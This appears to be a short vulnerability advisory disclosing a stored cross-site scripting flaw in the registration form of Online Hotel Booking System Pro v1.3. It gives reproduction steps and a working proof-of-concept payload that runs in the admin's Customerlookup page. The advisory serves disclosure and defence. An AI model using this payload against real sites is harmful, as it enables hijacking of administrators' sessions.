# Exploit Title: Online Hotel Booking System Pro v1.3 XSS Vulnerability
# Google Dork:N/A
# Date: 2020-04-04
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://codecanyon.net/item/online-hotel-booking-system-pro/4606514
# Version: 1.3
# Tested on: 5.4.0-4parrot1-amd64

---------------------------------------------------------


Summary:

Persistent Cross-site Scripting in Customer registration-form   all-tags 

PoC 1:



1- Go to the hotel booking page then choose new customor 


http://example/hotel-booking-pro/

2- In "any " field of registration form type your payload :
 "><img src=x onerror=prompt(document.domain);>
 
3-then hit CONTINUE


4- Once the admin logs in and go to Customerlookup page ... the admin will be xssed 

http://example/hotel-booking-pro/cp/admin-home.php





Impact:
XSS can lead to adminstators/users's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other critical  attacks on administrators directly.



	
Screentshoots:

https://i.imgur.com/RWArdAB.png